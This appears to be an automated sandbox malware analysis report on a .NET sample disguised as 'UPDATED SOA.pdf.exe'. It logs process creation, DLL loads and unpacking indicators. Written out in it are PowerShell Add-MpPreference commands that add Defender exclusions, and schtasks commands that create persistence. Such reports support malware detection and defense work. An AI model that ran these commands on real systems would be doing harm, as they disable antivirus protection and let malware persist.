                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Users\user\Desktop\UPDATED SOA.pdf.exe "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpDE33.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess created: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\SysWOW64\expand.exe"
                Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpCB57.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeProcess created: C:\Users\user\Desktop\UPDATED SOA.pdf.exe "C:\Users\user\Desktop\UPDATED SOA.pdf.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TKgtDXuaZu" /XML "C:\Users\user\AppData\Local\Temp\tmpDE33.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeProcess created: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe "C:\Users\user\AppData\Roaming\TKgtDXuaZu.exe"Jump to behavior
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\SysWOW64\expand.exe"
                Source: C:\Windows\SysWOW64\expand.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\AppData\Roaming\TKgtDXuaZu.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: cabinet.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: mlang.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\expand.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeSection loaded: wininet.dll
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeSection loaded: mswsock.dll
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeSection loaded: dnsapi.dll
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeSection loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeSection loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\pdtrYVhmFZZvFThwWBoxFercZXeZeXyzNuswdZcmngxeNBIrdNBbEV\S1OoUcW6nwo.exeSection loaded: rasadhlp.dll
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeAutomated click: Continue
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeAutomated click: Continue
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\expand.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: UPDATED SOA.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: UPDATED SOA.pdf.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: UPDATED SOA.pdf.exeStatic file information: File size 1064448 > 1048576
                Source: UPDATED SOA.pdf.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x101200
                Source: UPDATED SOA.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: UPDATED SOA.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: expand.pdb source: UPDATED SOA.pdf.exe, 00000009.00000002.2033466859.0000000001038000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000003.1970720685.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000002.4143427596.00000000016E1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: UPDATED SOA.pdf.exe, 00000009.00000002.2033978508.0000000001490000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.000000000489E000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2034981393.0000000004553000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2032881850.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.0000000004700000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: UPDATED SOA.pdf.exe, UPDATED SOA.pdf.exe, 00000009.00000002.2033978508.0000000001490000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.000000000489E000.00000040.00001000.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2034981393.0000000004553000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000003.2032881850.00000000043A0000.00000004.00000020.00020000.00000000.sdmp, expand.exe, 00000012.00000002.4144118353.0000000004700000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: KUON.pdb source: UPDATED SOA.pdf.exe, TKgtDXuaZu.exe.0.dr
                Source: Binary string: KUON.pdbSHA256 source: UPDATED SOA.pdf.exe, TKgtDXuaZu.exe.0.dr
                Source: Binary string: expand.pdbGCTL source: UPDATED SOA.pdf.exe, 00000009.00000002.2033466859.0000000001038000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000003.1970720685.00000000016D4000.00000004.00000020.00020000.00000000.sdmp, S1OoUcW6nwo.exe, 00000011.00000002.4143427596.00000000016E1000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: S1OoUcW6nwo.exe, 00000011.00000000.1956044730.0000000000E3F000.00000002.00000001.01000000.0000000E.sdmp, S1OoUcW6nwo.exe, 00000013.00000002.4142898457.0000000000E3F000.00000002.00000001.01000000.0000000E.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.UPDATED SOA.pdf.exe.3fd8168.4.raw.unpack, DcEL2LtfcXFUOZVC4R.cs.Net Code: iXlM40rJxG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UPDATED SOA.pdf.exe.44b0000.5.raw.unpack, DcEL2LtfcXFUOZVC4R.cs.Net Code: iXlM40rJxG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UPDATED SOA.pdf.exe.3f4d548.2.raw.unpack, DcEL2LtfcXFUOZVC4R.cs.Net Code: iXlM40rJxG System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UPDATED SOA.pdf.exe.34f80a8.1.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: 0.2.UPDATED SOA.pdf.exe.4d60000.6.raw.unpack, RK.cs.Net Code: _206F_200B_206F_206E_200F_206F_200F_202A_200D_200F_200F_202B_206F_200B_200B_200C_200B_200B_200E_206C_200F_206E_200E_206A_200F_200B_206B_206F_200F_206E_200F_200F_206D_206C_202C_202D_206F_202D_200B_202C_202E System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_06839680 push eax; ret 0_2_06839681
                Source: C:\Users\user\Desktop\UPDATED SOA.pdf.exeCode function: 0_2_0683052E push cs; ret 0_2_0683052F
